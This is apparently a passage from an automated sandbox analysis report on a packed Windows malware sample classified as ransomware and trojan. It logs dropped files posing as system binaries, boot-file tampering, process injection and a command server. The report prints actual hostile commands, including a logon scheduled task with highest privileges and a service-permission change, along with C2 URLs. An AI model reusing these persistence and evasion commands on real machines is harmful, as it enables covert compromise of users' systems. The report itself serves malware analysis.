        Source: C:\Users\user\Desktop\0NlSa5bf55.exe | Process created: C:\Users\user\Desktop\upd.exe C:\Users\user\Desktop\upd.exe -update
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknown | Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
        Source: C:\Users\user\Desktop\upd.exe | Process created: C:\Users\user\Desktop\upd.exe "C:\Users\user\Desktop\upd.exe" -update
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: C:\Users\user\Desktop\upd.exe | Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
        Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\SysWOW64\mountvol.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\SysWOW64\mountvol.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\SysWOW64\mountvol.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\SysWOW64\mountvol.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: C:\Windows\SysWOW64\shutdown.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\windefender.exe C:\Windows\windefender.exe
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\windefender.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\windefender.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: unknown | Process created: C:\Windows\windefender.exe C:\Windows\windefender.exe
        Source: C:\Users\user\Desktop\0NlSa5bf55.exe | Process created: C:\Users\user\Desktop\upd.exe C:\Users\user\Desktop\upd.exe -update
        Source: C:\Users\user\Desktop\upd.exe | Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\windefender.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Users\user\Desktop\upd.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32
        Source: C:\Users\user\Desktop\upd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\rss\csrss.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\windefender.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Users\user\Desktop\0NlSa5bf55.exe | File created: C:\Users\user\Desktop\upd.exe
        Source: C:\Windows\rss\csrss.exe | File created: C:\Users\user\AppData\Local\Temp\csrss
        Source: classification engine | Classification label: mal100.rans.troj.evad.winEXE@41/15@21/5
        Source: csrss.exe, 0000000B.00000002.568351371.00000000119DE000.00000004.00000001.sdmp | Binary or memory string: SELECT BuildNumber FROM Win32_OperatingSystemh3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}https://server2.trumops.com/bots/post-ia-data?uuid=442b90d2-fde4-485f-a003-6086e2191d6e
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019B27F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,
        Source: 0NlSa5bf55 | Joe Sandbox Cloud Basic: Detection: clean Score: 0
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
        Source: C:\Windows\rss\csrss.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\qtxp9g8w
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2700:120:WilError_01
        Source: upd.exe | String found in binary or memory: application/app/install.go
        Source: upd.exe | String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
        Source: upd.exe | String found in binary or memory: application/resilience/btcblockchain/address.go
        Source: upd.exe | String found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
        Source: csrss.exe | String found in binary or memory: application/app/install.go
        Source: csrss.exe | String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
        Source: csrss.exe | String found in binary or memory: application/resilience/btcblockchain/address.go
        Source: csrss.exe | String found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
        Source: 0NlSa5bf55.exe | String found in binary or memory: Mask/AddresOEnv
        Source: C:\Users\user\Desktop\0NlSa5bf55.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\rss\csrss.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: 0NlSa5bf55.exe | Static file information: File size 2095616 > 1048576
        Source: 0NlSa5bf55.exe | Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x1ff600
        Source: Binary string: Loader.pdb | source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, bootx64.efi.11.dr
        Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with | source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. | source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: Age does not matchThe module age and .pdb age do not match. | source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: symsrv.pdb | source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
        Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. | source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb | source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb | source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. | source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb | source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: '(.EfiGuardDxe.pdb | source: upd.exe.0.dr
        Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. | source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb | source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb | source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: Unable to locate the .pdb file in this location source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: The module signature does not match with .pdb signature. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: .pdb.dbg source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: '(EfiGuardDxe.pdbx source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
        Source: Binary string: symsrv.pdbGCTL source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
        Source: Binary string: or you do not have access permission to the .pdb location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: EfiGuardDxe.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
        Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: dbghelp.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: dbghelp.pdbGCTL source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: C:\Windows\rss\csrss.exe Code function: 11_3_119322AA pushad ; ret
        Source: 0NlSa5bf55.exe Static PE information: section name: UPX2
        Source: upd.exe.0.dr Static PE information: section name: UPX2
        Source: csrss.exe.8.dr Static PE information: section name: UPX2
        Source: injector.exe.11.dr Static PE information: section name: _RDATA
        Source: windefender.exe.11.dr Static PE information: section name: UPX2
        Source: bootmgfw.efi.11.dr Static PE information: section name: .xdata
        Source: bootx64.efi.11.dr Static PE information: section name: .xdata
        Source: EfiGuardDxe.efi.11.dr Static PE information: section name: .xdata
        Source: NtQuerySystemInformationHook.dll.11.dr Static PE information: section name: _RDATA
        Source: EfiGuardDxe.efi.11.dr Static PE information: real checksum: 0x4a5a6 should be: 0x51a75
        Source: csrss.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x3a37d7
        Source: bootmgfw.efi.11.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
        Source: bootx64.efi.11.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
        Source: injector.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x54ea2
        Source: windefender.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x20ae45
        Source: 0NlSa5bf55.exe Static PE information: real checksum: 0x0 should be: 0x20add5
        Source: upd.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x3a37d7
        Source: NtQuerySystemInformationHook.dll.11.dr Static PE information: real checksum: 0x0 should be: 0x2279d
        Source: initial sample Static PE information: section name: UPX0
        Source: initial sample Static PE information: section name: UPX1
        Source: initial sample Static PE information: section name: UPX0
        Source: initial sample Static PE information: section name: UPX1
        Source: initial sample Static PE information: section name: UPX0
        Source: initial sample Static PE information: section name: UPX1
        Source: initial sample Static PE information: section name: UPX0
        Source: initial sample Static PE information: section name: UPX1

        Persistence and Installation Behavior:

        Drops executables to the windows directory (C:\Windows) and starts them
        Source: C:\Users\user\Desktop\upd.exe Executable created and started: C:\Windows\rss\csrss.exe
        Source: unknown Executable created and started: C:\Windows\windefender.exe
        Drops PE files with benign system names
        Source: C:\Users\user\Desktop\upd.exe File created: C:\Windows\rss\csrss.exe
        Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi
        Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi
        Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi
        Source: C:\Users\user\Desktop\0NlSa5bf55.exe File created: C:\Users\user\Desktop\upd.exe
        Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Boot\old.efi (copy)
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
        Source: C:\Users\user\Desktop\upd.exe File created: C:\Windows\rss\csrss.exe
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi
        Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi
        Source: C:\Windows\rss\csrss.exe File created: C:\Windows\windefender.exe
        Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi
        Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Microsoft\Boot\fw.efi (copy)
        Source: C:\Users\user\Desktop\upd.exe File created: C:\Windows\rss\csrss.exe
        Source: C:\Windows\rss\csrss.exe File created: C:\Windows\windefender.exe

        Boot Survival:

        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

        Hooking and other Techniques for Hiding and Protection:

        May modify the system service descriptor table (often done to hook functions)
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
        Source: upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
        Source: C:\Users\user\Desktop\0NlSa5bf55.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\0NlSa5bf55.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\upd.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\upd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\upd.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\upd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
